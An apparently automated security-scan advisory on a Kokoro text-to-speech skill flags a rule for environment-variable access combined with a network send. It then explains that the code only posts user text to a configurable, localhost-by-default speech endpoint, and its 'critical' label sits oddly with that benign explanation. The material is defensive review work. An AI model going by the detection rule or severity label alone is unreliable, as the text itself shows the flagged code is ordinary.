critical
suspicious.env_credential_access
- Location
- scripts/tts.js:6
- Finding
- Environment variable access combined with network send.
Kokoro TTS
AdvisoryAudited by Static analysis on May 10, 2026.
Overview
Detected: suspicious.env_credential_access
Findings (1)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
What this means
Sensitive text spoken through this skill could be visible to the configured Kokoro server operator if a remote endpoint is used.
Why it was flagged
The user-provided text is sent to the configured TTS endpoint. This is expected for the skill, but if KOKORO_API_URL points to a remote server, the text leaves the local machine.
Skill content
const API_URL = process.env.KOKORO_API_URL || 'http://localhost:8880/v1/audio/speech'; ... fetch(API_URL, { method: 'POST', ... body: JSON.stringify({ input: text, voice: voice, speed: speed, ... }) })Recommendation
Use the default local endpoint or another trusted endpoint, prefer secure transport for remote servers, and avoid sending secrets or private content to untrusted TTS services.
What this means
Installation or invocation may fail if Node.js is not available, and users may not notice the optional endpoint configuration from metadata alone.
Why it was flagged
The skill documentation depends on a Node.js command and optional environment configuration, while the registry metadata declares no required binaries or environment variables. This is a minor packaging/metadata gap, not hidden behavior.
Skill content
The skill uses the `KOKORO_API_URL` environment variable ... node skills/kokoro-tts/scripts/tts.js "<text>" [voice] [speed]
Recommendation
Document Node.js as a runtime requirement and declare KOKORO_API_URL as an optional configuration variable in the registry metadata.